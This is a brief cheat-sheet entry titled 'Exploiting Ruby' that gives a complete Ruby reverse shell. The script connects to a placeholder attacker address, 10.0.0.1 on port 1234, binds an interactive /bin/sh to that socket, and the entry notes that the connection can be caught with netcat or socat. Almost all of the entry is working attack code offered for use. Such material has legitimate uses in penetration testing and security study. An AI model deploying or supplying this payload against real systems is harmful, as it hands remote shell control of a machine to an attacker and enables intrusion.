Exploiting Ruby

author: Nathan Acks
date: 2022-07-11

A simple reverse shell:

require "socket"

attacker_ip = "10.0.0.1"
attacker_port = 1234

f = TCPSocket.open(attacker_ip, attacker_port).to_i

exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)

Catch it with netcat or socat.

slyth11907 / Cheatsheets
Ruby - Socket Programming